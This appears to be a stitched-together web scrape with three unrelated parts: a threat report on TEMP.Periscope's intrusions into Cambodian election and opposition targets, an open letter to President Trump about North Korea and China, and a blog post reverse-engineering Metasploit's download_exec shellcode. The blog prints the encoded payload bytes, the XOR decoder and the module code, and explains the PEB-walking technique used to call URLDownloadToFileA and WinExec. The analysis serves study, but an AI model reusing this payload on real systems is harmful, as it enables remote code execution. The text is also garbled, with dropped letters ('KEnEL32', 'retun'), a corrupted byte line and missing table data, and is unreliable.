    • Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
    • Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
  • The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX) .

Compromises of Cambodian Election Entities

Analysis of command and control logs on the servers revealed compromises of multiple Cambodian entities, primarily those relating to the upcoming July 2018 elections. In addition, a separate spear phishing email analyzed by FireEye indicates concurrent targeting of opposition figures within Cambodia by TEMP.Periscope.

Analysis indicated that the following Cambodian government organizations and individuals were compromised by TEMP.Periscope:

  • National Election Commission, Ministry of the Interior, Ministry of Foreign Affairs and International Cooperation, Cambodian Senate, Ministry of Economics and Finance
  • Member of Parliament representing Cambodia National Rescue Party
  • Multiple Cambodians advocating human rights and democracy who have written critically of the current ruling party
  • Two Cambodian diplomats serving overseas
  • Multiple Cambodian media entities

TEMP.Periscope sent a spear phish with AIRBREAK malware to Monovithya Kem, Deputy Director-General, Public Affairs, Cambodia National Rescue Party (CNRP), and the daughter of (imprisoned) Cambodian opposition party leader Kem Sokha (Figure 2). The decoy document purports to come from LICADHO (a non-governmental organization [NGO] in Cambodia established in 1992 to promote human rights). This sample leveraged scsnewstoday[.]com for C2.

Figure 2: Human right protection survey lure

The decoy document "Interview Questions.docx" (MD5: ba1e5b539c3ae21c756c48a8b5281b7e) is tied to AIRBREAK downloaders of the same name. The questions reference the opposition Cambodian National Rescue Party, human rights, and the election (Figure 3).

Figure 3: Interview questions decoy

Infrastructure Also Used for Operations Against Private Companies

The aforementioned malicious infrastructure was also used against private companies in Asia, Europe and North America. These companies are in a wide range of industries, including academics, aviation, chemical, maritime, and technology. A MURKYTOP sample from 2017 and data contained in a file linked to chemscalere[.]com suggest that a corporation involved in the U.S. defense industrial base (DIB) industry, possibly related to maritime research, was compromised. Many of these compromises are in line with TEMP.Periscope’s previous activity targeting maritime and defense industries. However, we also uncovered the compromise of a European chemical company with a presence in Asia, demonstrating that this group is a threat to business worldwide, particularly those with ties to Asia.

AIRBREAK Downloaders and Droppers Reveal Lure Indicators

Filenames for AIRBREAK downloaders found on the open indexed sites also suggest the ongoing targeting of interests associated with Asian geopolitics. In addition, analysis of AIRBREAK downloader sites revealed a related server that underscores TEMP.Periscope's interest in Cambodian politics.

The AIRBREAK downloaders in Table 1 redirect intended victims to the indicated sites to display a legitimate decoy document while downloading an AIRBREAK payload from one of the identified C2s. Of note, the hosting site for the legitimate documents was not compromised. An additional C2 domain, partyforumseasia[.]com, was identified as the callback for an AIRBREAK downloader referencing the Cambodian National Rescue Party.

Redirect Site (Not Malicious)

AIRBREAK Downloader



(3c51c89078139337c2c92e084bb0904c) [Figure 4]










Philippines-draws-three-hard-new-lines-on-china .js







Table 1: AIRBREAK downloaders

Figure 4: Decoy document associated with AIRBREAK downloader file TOP_NEWS_Japan_to_Support_the_Election.js

SCANBOX Activity Gives Hints to Future Operations

The active SCANBOX server, mlcdailynews[.]com, is hosting articles related to the current Cambodian campaign and broader operations. Articles found on the server indicate targeting of those with interests in U.S.-East Asia geopolitics, Russia and NATO affairs. Victims are likely either brought to the SCANBOX server via strategic website compromise or malicious links in targeted emails with the article presented as decoy material. The articles come from open-source reporting readily available online. Figure 5 is a SCANBOX welcome page and Table 2 is a list of the articles found on the server.

Figure 5: SCANBOX welcome page

Copied Article Topic

Article Source (Not Compromised)

Leaders confident yet nervous

Khmer Times

Mahathir_ 'We want to be friendly with China

PM urges voters to support CPP for peace

CPP determined to maintain Kingdom's peace and development

Bun Chhay's wife dies at 60

Crackdown planned on boycott callers

Further floods coming to Kingdom

Kem Sokha again denied bail

PM vows to stay on as premier to quash traitors

Iran_ Don't trust Trump

Fresh News

Kim-Trump summit_ Singapore's role

Trump's North Korea summit may bring peace declaration - but at a cost


U.S. pushes NATO to ready more forces to deter Russian threat


Interior Minister Sar Kheng warns of dirty tricks

Phnom Penh Post

Another player to enter market for cashless pay

Donald Trump says he has 'absolute right' to pardon himself but he's done nothing wrong - Donald Trump's America

ABC News

China-funded national road inaugurated in Cambodia

The Cambodia Daily

Kim and Trump in first summit session in Singapore

Asia Times

U.S. to suspend military exercises with South Korea, Trump says

U.S. News

Rainsy defamed the King_ Hun Sen



Associated Press

Table 2: SCANBOX articles copied to server

TEMP.Periscope Malware Suite

Analysis of the malware inventory contained on the three servers found a classic suite of TEMP.Periscope payloads, including the signature AIRBREAK, MURKYTOP, and HOMEFRY. In addition, FireEye’s analysis identified new tools, EVILTECH and DADBOD (Table 3).






  • EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
  • During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or connection to another attacker-controlled system.


Credential Theft

  • DADBOD is a tool used to steal user cookies.
  • Analysis of this malware is still ongoing.

Table 3: New additions to the TEMP.Periscope malware suite

Data from Logs Strengthens Attribution to China

Our analysis of the servers and surrounding data in this latest campaign bolsters our previous assessment that TEMP.Periscope is likely Chinese in origin. Data from a control panel access log indicates that operators are based in China and are operating on computers with Chinese language settings.

A log on the server revealed IP addresses that had been used to log in to the software used to communicate with malware on victim machines. One of the IP addresses,, is located in Hainan, China. Other addresses belong to virtual private servers, but artifacts indicate that the computers used to log in all cases are configured with Chinese language settings.

Outlook and Implications

The activity uncovered here offers new insight into TEMP.Periscope’s activity. We were previously aware of this actor’s interest in maritime affairs, but this compromise gives additional indications that it will target the political system of strategically important countries. Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.

The targeting of the election commission is particularly significant, given the critical role it plays in facilitating voting. There is not yet enough information to determine why the organization was compromised – simply gathering intelligence or as part of a more complex operation. Regardless, this incident is the most recent example of aggressive nation-state intelligence collection on election processes worldwide.

We expect TEMP.Periscope to continue targeting a wide range of government and military agencies, international organizations, and private industry. However focused this group may be on maritime issues, several incidents underscore their broad reach, which has included European firms doing business in Southeast Asia and the internal affairs of littoral nations. FireEye expects TEMP.Periscope will remain a virulent threat for those operating in the area for the foreseeable future.

A Suggestion for President Trump regarding Dealing with North Korea

Dear President Trump,

Hello. As President of Paramount Defenses, I pen this letter most respectfully to you, the President of our United States.

Sir, almost all reasonable people would agree that a bellicose and now nuclear North Korea likely poses a threat not just to the United States but to the whole world, and that this threat must be dealt with. While there are several options, including military options, that you may be considering, I just wanted to say that you may want to give a peaceful resolution to this situation a reasonable chance (because wars are gruesomely destructive), and perhaps there may be still something that could be done.

Of course, North Korea must make no mistake about one fact - it must unequivocally understand that if it attacks the U.S. or its territories or allies, the U.S. will have no choice but to act to defend itself, and if it does, it will likely be the end of North Korea.

Speaking of Nuclear Weapons and North Korea

I likely speak on behalf of not just millions of American citizens, but billions of people worldwide when I say that this dangerous "sabre rattling" needs to please stop; we just cannot have a(ny) country threatening the world with the use of Nuclear Weapons.

Nuclear Weapons

We should also make NO mistake about this - This must please stop, and yet we must try and do all we can do to resolve this PEACEFULLY, because wars are gruesomely destructive. It is estimated that should this situation result in a war on the Korean peninsula, millions of people in numerous countries may lose their lives and/or be severely impacted.

If I might add, in today's civilized world, no one person in the world, whether it be the leader of any country (whether it be North Korea, Iran, China, Russia, USA, etc.) or entity should be able to endanger the lives of all 7,000,000,000+ people on Earth.

Speaking of peaceful efforts, allow me to voice one unsolicited suggestion, which involves a country that may likely have, over the years, whether unintentionally or otherwise, played^ a (not so small) role in helping North Korea get where it is today, and they now ought to do everything they can to help resolve this situation peacefully, and that one country is China.

 [ ^ Watch this 6 min video - "China is North Korea's largest trading partner and has pushed hard for the livelihood exemptions" , "Sanctions will only be as effective as Beijing wants them to be" , "Regime survival is exactly what China actually wants to see"]

Where Does China Stand on This?

Sir, as of Aug 11, 17, you've certainly tried to have China resolve this problem. However, it does not seem to (yet) have worked.

As of this morning, according to the Global Times newspaper, which although is not an official mouthpiece of the Communist Party, does according to experts most likely reflect government policy, China is likely okay with an armed conflict in the region.

I quote from here -
"Beijing is not able to persuade Washington or Pyongyang to back down at this time. It needs to make clear its stance to all sides and make them understand that when their actions jeopardize China's interests, China will respond with a firm hand."
"China should also make clear that if North Korea launches missiles that threaten U.S. soil first and the U.S. retaliates, China will stay neutral. If the U.S. and South Korea carry out strikes and try to overthrow the North Korean regime and change the political pattern of the Korean peninsula, China will prevent them from doing so."

In other words, by not being against it, China is apparently tacitly okay with an armed conflict in the region. That's concerning.

Today, no country in the world should be okay with any such conflict, especially one involving countries with Nuclear Weapons.

China needs to realize that now is the time to respond to North Korea with a firm hand (; lest it might be too late & cost a 100x.)

China may need to unequivocally understand that this isn't just about a regional conflict or stability in one specific region of the world, but that this could result in the use of Nuclear Weapons and that could potentially dangerously impact the entire world.

The Suggestion - Having China Do More

In reality, as its largest trading partner, China does likely have a substantial amount of influence on North Korea, which is also why most sanctions imposed on North Korea by the U.N. thus far may have only been as effective as China wanted them to be.

Thus, perhaps, all countries in the world that desire peace, led by the U.S., should earnestly communicate to China that unless China does more to help, the world may have no choice left but to begin to look into potentially unfair Chinese trade practices and consider* (even if temporarily) substantially reducing their imports from China (i.e. the import of goods Made in China).

Perhaps, as a consequence, if China realizes that the world may seriously no longer be interested in importing its inexpensive goods, and that it may stand to lose up to a Trillion $ in trade each year, unless it "reins in" North Korea, perhaps it will do more.

(As such, China should be quite concerned about the possibility of any armed conflict in its region as it could impact its people. If concern for the safety of its billion+ people doesn't motivate China, perhaps the potential of a Trillion $ a year of loss, may.)

China may very well understand this today, so they need to flex some serious muscle to help resolve this dangerous situation.

[ A small digression...

An Unintended Impact

Incidentally, this could help kick-start your Made in USA initiative, and perhaps help reduce the trade imbalance with China, and although products for the U.S. consumer may no longer be dirt cheap, it could start bringing back American manufacturing jobs, thus helping your #MAGA slogan.

Speaking of #MAGA, while America is already a great country, its greatness may likely indeed have diminished a bit in light of globalization, and speaking of jobs, perhaps it may help to let the American people know that it is our own companies, i.e. the major companies whose products the American populace consumes, that whether driven by fierce competition and/or a desire to "maximize shareholder value", may have over the years substantially outsourced manufacturing, so and it may be up to the people to consider having (and if they decide, could have) these companies put country/security ahead of maximizing profits.

(It is difficult to walk into a Walmart or a Home Depot anywhere in the U.S. and find any products that are not "Made in China." Obviously, since you Sir, are (supposedly) a Billionaire, I do not expect you to have personally walked into a Walmart or a Home Depot, but in all likelihood a majority all hard-working people living in the U.S. may likely know what I'm talking about.)

Lastly, perhaps we, the American people may also need to realize that it may not likely be possible to simultaneously have both, "dirt-cheap (i.e. super inexpensive) products" and "American manufacturing jobs." Perhaps, if there is a strong desire to bring back manufacturing jobs to the U.S., it may require, even if for a bit, some adjustments as consumers - perhaps consume a little less, but buy quality products that are Made in USA as well as made in all such countries that adhere to fair trade practices.

Here, I should mention that it is also certainly possibly for (a more responsible and fairly competing) China to continue to be a major exporter of goods to the U.S., just as long as the Chinese too engage in manufacturing under fair trade practices, fair employment, regard for the environment, and for human rights, thus making the manufacturing playing-field level for all nations.

Alternatively, in lieu of having thousands of companies bring back manufacturing jobs to America, perhaps we could make solid results-driven investments towards helping our workforce acquire skills in those fields and industries that play a substantial role in contributing to America's exports, in effect helping millions of our people find suitable, respectable and gainful employment, as well as contributing to an increase in American exports, which too will have the effect of improving uneven trade deficits.

Speaking of Made in USA, perhaps the best way for you Sir, to demonstrate your commitment and seriousness of purpose to #MAGA, may likely be to lead by example and have all products made by the Trump Organization be made here in USA.

... end of digression.]

In Summary

The World should stand united on one front - regarding threats involving use of Nuclear Weapons, there must be zero tolerance.

As for North Korea, it must make no mistake about one fact - it must unequivocally understand that if it attacks the U.S. or its territories or allies, the U.S. will have no choice but to act to defend itself, and if it does, it will likely be the end of North Korea.

The Chinese too must understand that any military conflict in their region, especially one potentially involving the use of even a single nuclear weapon, and its fallout, could endanger not just all the countries in the Korean Peninsula, but also likely threaten and perhaps possibly jeopardize the very existence of Earth, and the last I checked, a billion Chinese people too, live on Earth.

If a millennia of history haven't taught us about the horrors and savagery that military conflicts and wars entail, and if a millennia of progress hasn't made us all realize that we all need to peacefully co-exist, then while we may have made material progress, what have we truly learnt?

Instead of predominantly pursuing profits, world-domination and egos, we should (all) instead be first pursuing peace, love and harmony, improving life for everyone, and cherishing and saving our precious planet (because in the Universe, its all we have.)

Most respectfully,

PS: I write neither as a Republican nor a Democrat, merely as a caring citizen, and not just as a U.S. citizen, but as a peace-loving global citizen, i.e. just one of 7,000,000,000+ people that live in 150+ countries worldwide who believe in living in Peace.

*A Note to China: We respect almost everyone, including your great nation, we mean no disrespect whatsoever, and like you we believe in fair trade, including with your nation, but far more importantly, we also value and believe in peaceful co-existence (as should you), so if the suggestion made above seems a tad extreme, please consider that it is only made in light of far more extreme circumstances i.e. a belligerent North Korea threatening (in effect, not only) the U.S. (but global security) with WMDs.

You ought to ask yourselves if you're really doing everything you can to diffuse this incredibly reckless and dangerous situation; should this result in an armed conflict in your region, your great country and its people may very likely be substantially impacted.

This is not the time for any party to play "Chess." This is the time for all countries to help prevent a potentially nuclear conflict.

Musings on download_exec.rb


This is not anything new and exciting¹, and should hopefully be familiar to some of you reading this. Some time ago I reversed the shellcode from Metasploit's download_exec module. It's a bit different from the rest of the stuff in MSF, because there's no source code with it, and it lacks certain features that the other shellcode[s] have (like being able to set the exit function).

When I started writing this blog post, the day before yesterday, I looked into the history of this particular scrap of code…

It's very similar to lion's downloadurl_v31.c available here:

… Except that, that code seems to be a more recent version than the code in MSF. For example, that does the LSD-PL function name hash trick, rather than lug around the full function names for look-up (as the version in MSF does.)

So, lion was a major figure in the Chinese 红客 Honker scene — literally translated as Red Guest (or Red Visitor or Red Passenger). (Basically Hackers who are also Chinese nationalists.) His group was the Honker Union of China [HUC], — this site seems to have been dead for a while. He wrote a lot of code back in 2003 and 2004. (我现在明白了一些在写这个汉字!)

I managed to dig up an older version of this 'downloadurl' code dated 2003-09-01 which is closer to the code in MSF. [archive] The code credits ey4s (from XFocus I think) for the actual shellcode.

Anyway, big chunks of this code, like the whole PEB method, also look like they were directly copied from Skape's old stuff (Dec 2003) — which was copied from Dino Dai Zovi (Apr 2003) — which was copied from Ratter/29A (Mar 2002) etc. etc. Like I said, this is all very old stuff. None of it has really changed since 2002, and it's still in very common use.

pita's contribution to all this appears to be wrapping up the blob of code

output by the lion program above into a MSF2 module:

Meta Commentary

What is the plural of the word shellcode? Neither shellcodes nor shellscode sound right. I believe that the word shellcode is a mass noun, so it's the same singular as plural. (Or at the very least, it only sounds right as a plural when used with a plural verb.) If I have some shellcode, and I add some more shellcode to that, then I still have some shellcode, more shellcode than before.

Bob has one shellcode.

Alice wrote three shellcode.

Malory has a lot of shellcode.









Bob has one shellcode.

Alice wrote three shellcodes.

Malory has a lot of shellcodes.




Here is shellcode. ← Sounds ok to me.

Here is a shellcode. ← No, sounds wrong.

Here is some shellcode. ← Sounds ok to me.

Here is some shellcodes. ← No, sounds wrong.

Here are some shellcode. ← Doesn't sound right either.

Here are some shellcodes. ← Sounds ok to me.

Long Technical Part

Let's take a look at the MSF code

# This file is part of the Metasploit Framework and may be subject to


'License' => BSD_LICENSE,

'Platform' => 'win',

'Arch' => ARCH_X86,

'Privileged' => false,

'Payload' =>


'Offsets' => { },

'Payload' =>



The decoder is self-explanatory, so I don't know why I'm explaining it, anyway… It finds where it is in memory, XORs the encrypted code right after it, and then runs the decrypted code.

0000  EB10         jmp short 0x12           ; Get EIP trick

0002 5A pop edx ; EDX points to the star

; of the encoded shellcod

0003 4A dec edx ; The LOOP exits at ECX=0,

; so XOR [EDX+0],0x99 never

; happens (Last XOR is [EDX+1])

0004 33C9 xor ecx,ecx ; ECX = 0

0006 66B93C01 mov cx,0x13c ; Shellcode length = 0x13C

000A 80340A99 xor byte [edx+ecx],0x99 ; Encoder/Decoder (xor) Key=0x99

000E E2FA loop 0xa ; XOR each byte from the end

; to the begining

0010 EB05 jmp short 0x17 ; Run decoded shellcode

0012 E8EBFFFFFF call 0x2 ; PUSH EIP

0017 ... ; Start of shellcode

Here's the decrypted shellcode, side by side with the original.


"\x70\x4C\x99\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"+ #000 e9 d5 00 00 00 5a 64 a1 30 00 00 00 8b 40 0c 8b |.....Zd.0....@..|

"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"+ #010 70 1c ad 8b 40 08 8b d8 8b 73 3c 8b 74 1e 78 03 |p...@....s<.t.x.|

"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"+ #020 f3 8b 7e 20 03 fb 8b 4e 14 33 ed 56 57 51 8b 3f |..~ ...N.3.VWQ.?|

"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"+ #030 03 fb 8b f2 6a 0e 59 f3 a6 74 08 59 5f 83 c7 04 |....j.Y..t.Y_...|

"xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"+ #040 45 e2 e9 59 5f 5e 8b cd 8b 46 24 03 c3 d1 e1 03 |E..Y_^...F$.....|

"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"+ #050 c1 33 c9 66 8b 08 8b 46 1c 03 c3 c1 e1 02 03 c1 |.3.f...F........|

"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9D\xC0"+ #060 8b 00 03 c3 8b fa 8b f7 83 c6 0e 8b d0 6a 04 59 |.............j.Y|

"\x71\xC9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"+ #070 e8 50 00 00 00 83 c6 0d 52 56 ff 57 fc 5a 8b d8 |.P......RV.W.Z..|

"\xF3\x98\xC0\x71\xA4\x99\x99\x99\x1A\x5F\x8A\xCF\xDF\x19\xA7\x19"+ #080 6a 01 59 e8 3d 00 00 00 83 c6 13 56 46 80 3e 80 |j.Y.=......VF.>.|

"\xEC\x63\x19\xAF\x19\xC7\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCE"+ #090 75 fa 80 36 80 5e 83 ec 20 8b dc 6a 20 53 ff 57 |u..6.^.. ..j S.W|

"\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"+ #0a0 ec c7 04 03 5c 61 2e 65 c7 44 03 04 78 65 00 00 |....a.e.D..xe..|

"\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66\xCE\x65\x12\x45\xC9\xCA\x66\xCE"+ #0b0 33 c0 50 50 53 56 50 ff 57 fc 8b dc 50 53 ff 57 |3.PPSVP.W...PS.W|

"\x69\xC9\x66\xCE\x6D\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA"+ #0c0 f0 50 ff 57 f4 33 c0 ac 85 c0 75 f9 51 52 56 53 |.P.W.3....u.QRVS|

"\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\xBF\x66\x66\x66\xDE"+ #0d0 ff d2 5a 59 ab e2 ee 33 c0 c3 e8 26 ff ff ff 47 |..ZY...3...&...G|

"\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDE\xFC"+ #0e0 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 47 65 |etProcAddress.Ge|

"\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD\xF0\xEB\xFC\xFA\xED\xF6\xEB\xE0"+ #0f0 74 53 79 73 74 65 6d 44 69 72 65 63 74 6f 72 79 |tSystemDirectory|

"\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xCD\xF1"+ #100 41 00 57 69 6e 45 78 65 63 00 45 78 69 74 54 68 |A.WinExec.ExitTh|

"\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0"+ #110 72 65 61 64 00 4c 6f 61 64 4c 69 62 72 61 72 79 |read.LoadLibrary|

"\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99\xCC\xCB\xD5\xDD\xF6\xEE\xF7"+ #120 41 00 75 72 6c 6d 6f 6e 00 55 52 4c 44 6f 77 6e |A.urlmon.URLDown|

"\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99" #130 6c 6f 61 64 54 6f 46 69 6c 65 41 00 |loadToFileA.|




# EXITFUNC is not supported :/


# Register command execution options


['URL', [ true, "The pre-encoded URL to the executable" ])

], self.class)



# Constructs the payload


def generate_stage

retun module_info['Payload']['Payload'] + (datastore['URL'] || '') + "\x80"



Finding KEnEL32.DLL

The MSDN documentation on the PEB structure is rather lacking in detail.

This is a bit more useful: PEB on

Ditto for the MSDN info on _PEB_LDR_DATA

This is better:PEB_LDR_DATA on,

and this: PEB_LDR_DATA on

The best information I've found on the structures is from using dt in kd.

I originally drew this in ASCII, and then redrew this using the Unicode box drawing characters. But then I discovered that Firefox gets the font metrics completely wrong, so that box drawing characters, in a monospace font, are all different widths, so nothing lines up. ← This is stupid. So it's 7-bit ASCII for now. (WebKit based browsers get it right, and so does lynx and links.)

The first six instructions of the shellcode (after the EIP stuff) find KEnEL32.DLL's base address by walking down the following chain of structures.

The FS segment register points to the _TEB for each executing thread. (Everyone remembers segment registers from the 16-bit days, right?) This is much simpler than keeping the pointer in memory somewhere, and then remembering where that memory was, etc. (It's also used to find the final exception handler if the program just can't cope.) This is also a clever optimization if you're going to be refening to stuff in the structure a lot. (Although FS:0 is uneachable from most C compilers, so inline assembly must be used.) The segment registers aren't used for much in userspace protected mode, so it doesn't contribute to register pressure. The _TEB usually lives around 0x7FFDF000 depending on a bunch of factors (like which version of Windows is used and how many threads).

This technique assumes that KEnEL32.DLL is the first module loaded (first node in the InInitilizationOrder Module List). If not, it'll crash and bun. Since all of the shellcode you see these days (in drive-by exploits, etc) does this exact same PEB lookup trick. You can break them all just by loading a dummy DLL first, before KEnEL32. Windows 7 does this now, apparently on accident.

For the uninitiated, I'll show you how this works…


+0x000 NtTib : _NT_TIB <- FS:0

+0x01c EnvironmentPointer : Ptr32 Void

+0x020 ClientId : _CLIENT_ID

+0x028 ActiveRpcHandle : Ptr32 Void

+0x02c ThreadLocalStoragePointer : Ptr32 Void

+0x030 ProcessEnvironmentBlock : Ptr32 _PEB -----┐

+0x034 LastEnorValue : Uint4B │

+0x038 CountOfOwnedCriticalSections : Uint4B │

[etc.] │

┌-------------------------------------------┘ MOV EAX, [FS:0x30]


+0x000 InheritedAddressSpace : UChar

+0x001 ReadImageFileExecOptions : UChar

+0x002 BeingDebugged : UChar

+0x003 SpareBool : UChar

+0x004 Mutant : Ptr32 Void

+0x008 ImageBaseAddress : Ptr32 Void

+0x00c Ldr : Ptr32 _PEB_LDR_DATA ---------------┐

+0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS │

+0x014 SubSystemData : Ptr32 Void │

+0x018 ProcessHeap : Ptr32 Void │

+0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION │

+0x020 FastPebLockRoutine : Ptr32 Void │

+0x024 FastPebUnlockRoutine : Ptr32 Void │

+0x028 EnvironmentUpdateCount : Uint4B │

+0x02c KenelCallbackTable : Ptr32 Void │

+0x030 SystemReserved : [1] Uint4B │

+0x034 AtlThunkSListPtr32 : Uint4B │

+0x038 FreeList : Ptr32 _PEB_FREE_BLOCK │

[etc.] │

┌-------------------------------------------------------------┘ MOV EAX, [EAX+0xC]

nt!_PEB_LDR_DATA [AKA: "ProcessModuleInfo" or "PROCESS_MODULE_INFO"]

+0x000 Length : Uint4B

+0x004 Initialized : UChar

+0x008 SsHandle : Ptr32 Void

+0x00c InLoadOrderModuleList : _LIST_ENTRY

+0x014 InMemoryOrderModuleList : _LIST_ENTRY

+0x01c InInitializationOrderModuleList : _LIST_ENTRY -----┐

+0x024 EntryInProgress : Ptr32 Void │

┌------------------------------------------------------┘ MOV ESI, [EAX+0x1C] ; LODSD


│ +0x000 InLoadOrderLinks : _LIST_ENTRY

│ +0x000 Flink : Ptr32

│ +0x004 Blink : Ptr32

│ +0x008 InMemoryOrderLinks : _LIST_ENTRY

│ +0x000 Flink : Ptr32

│ +0x004 Blink : Ptr32

│ +0x010 InInitializationOrderLinks : _LIST_ENTRY

└-------> +0x000 Flink : Ptr32 -┐ This distance

+0x004 Blink : Ptr32 │ is eight bytes

+0x018 DllBase : Ptr32 Void -┘ DllBase → _IMAGE_DOS_HEADER

+0x01c EntryPoint : Ptr32 Void

+0x020 SizeOfImage : Uint4B

+0x024 FullDllName : _UNICODE_STRING

+0x02c BaseDllName : _UNICODE_STRING

+0x034 Flags : Uint4B

+0x038 LoadCount : Uint2B

+0x03a TlsIndex : Uint2B

+0x03c HashLinks : _LIST_ENTRY

+0x03c SectionPointer : Ptr32 Void

+0x040 CheckSum : Uint4B

+0x044 TimeDateStamp : Uint4B

+0x044 LoadedImports : Ptr32 Void

+0x048 EntryPointActivationContext : Ptr32 Void

+0x04c PatchInformation : Ptr32 Void



Importing Functions

So at this point, the shellcode knows where to find the first DLL file that was mapped into memory. Now it finds functions in the library in the same way that Windows does it.


+0x000 InLoadOrderLinks : _LIST_ENTRY

+0x008 InMemoryOrderLinks : _LIST_ENTRY

+0x010 InInitializationOrderLinks : _LIST_ENTRY ← So EAX was pointing here

+0x018 DllBase : Ptr32 Void -------------┐ MOV EAX, [EAX+0x8]

[etc.] │

┌--------------------------------------------------------┘ MOV EBX, EAX

nt!_IMAGE_DOS_HEADER EBX points here, and is used for all Virtual Address offsets

+0x000 e_magic : Uint2B (usually "MZ")

+0x002 e_cblp : Uint2B

+0x004 e_cp : Uint2B

+0x006 e_crlc : Uint2B

+0x008 e_cparhdr : Uint2B

+0x00a e_minalloc : Uint2B

+0x00c e_maxalloc : Uint2B

+0x00e e_ss : Uint2B

+0x010 e_sp : Uint2B

+0x012 e_csum : Uint2B

+0x014 e_ip : Uint2B

+0x016 e_cs : Uint2B

+0x018 e_lfarlc : Uint2B

+0x01a e_ovno : Uint2B

+0x01c e_res : [4] Uint2B

+0x024 e_oemid : Uint2B

+0x026 e_oeminfo : Uint2B

+0x028 e_res2 : [10] Uint2B

+0x03c e_lfanew : Int4B -------┐ MOV ESI, [EBX+0x3C]




+0x000 Signature : Uint4B (usually "PE\0\0") --┐

+0x004 FileHeader : _IMAGE_FILE_HEADER │

+0x000 Machine : Uint2B │

+0x002 NumberOfSections : Uint2B │

+0x004 TimeDateStamp : Uint4B │

+0x008 PointerToSymbolTable : Uint4B │

+0x00c NumberOfSymbols : Uint4B │

+0x010 SizeOfOptionalHeader : Uint2B │

+0x012 Characteristics : Uint2B │ This distance is

+0x018 OptionalHeader : _IMAGE_OPTIONAL_HEADER │ 0x78 bytes long

+0x000 Magic : Uint2B │

+0x002 MajorLinkerVersion : UChar │

+0x003 MinorLinkerVersion : UChar │

+0x004 SizeOfCode : Uint4B │ (That's 0x18+0x60 bytes

+0x008 SizeOfInitializedData : Uint4B │ from the PE header to the

+0x00c SizeOfUninitializedData : Uint4B │ _IMAGE_DATA_DIRECTORY)

+0x010 AddressOfEntryPoint : Uint4B │

+0x014 BaseOfCode : Uint4B │

+0x018 BaseOfData : Uint4B │

+0x01c ImageBase : Uint4B │

+0x020 SectionAlignment : Uint4B │

+0x024 FileAlignment : Uint4B │

+0x028 MajorOperatingSystemVersion : Uint2B │

+0x02a MinorOperatingSystemVersion : Uint2B │

+0x02c MajorImageVersion : Uint2B │

+0x02e MinorImageVersion : Uint2B │

+0x030 MajorSubsystemVersion : Uint2B │

+0x032 MinorSubsystemVersion : Uint2B │

+0x034 Win32VersionValue : Uint4B │

+0x038 SizeOfImage : Uint4B │

+0x03c SizeOfHeaders : Uint4B │

+0x040 CheckSum : Uint4B │

+0x044 Subsystem : Uint2B │

+0x046 DllCharacteristics : Uint2B │

+0x048 SizeOfStackReserve : Uint4B │

+0x04c SizeOfStackCommit : Uint4B │

+0x050 SizeOfHeapReserve : Uint4B │

+0x054 SizeOfHeapCommit : Uint4B │

+0x058 LoaderFlags : Uint4B │

+0x05c NumberOfRvaAndSizes : Uint4B │

+0x060 DataDirectory : [16] _IMAGE_DATA_DIRECTORY -┘ MOV ESI, [ESI+EBX+0x78]; ADD ESI, EBX


/ (This isn't exactly kd output, I've fabricated it.)



+0x060 +0x000 VirtualAddress : Uint4B RVA of the table - Relative to Base Address (EBX)

+0x064 +0x004 Size : Uint4B


+0x068 +0x008 VirtualAddress : Uint4B

[etc.] +0x00c Size : Uint4B


+0x010 VirtualAddress : Uint4B

+0x014 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Exception Table

+0x018 VirtualAddress : Uint4B

+0x01c Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Certificate Table

+0x020 VirtualAddress : Uint4B

+0x024 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Base Relocation Table

+0x028 VirtualAddress : Uint4B

+0x02c Size : Uint4B


+0x030 VirtualAddress : Uint4B

+0x034 Size : Uint4B


+0x038 VirtualAddress : Uint4B

+0x03c Size : Uint4B


+0x040 VirtualAddress : Uint4B

+0x044 Size : Uint4B


+0x048 VirtualAddress : Uint4B

+0x04c Size : Uint4B

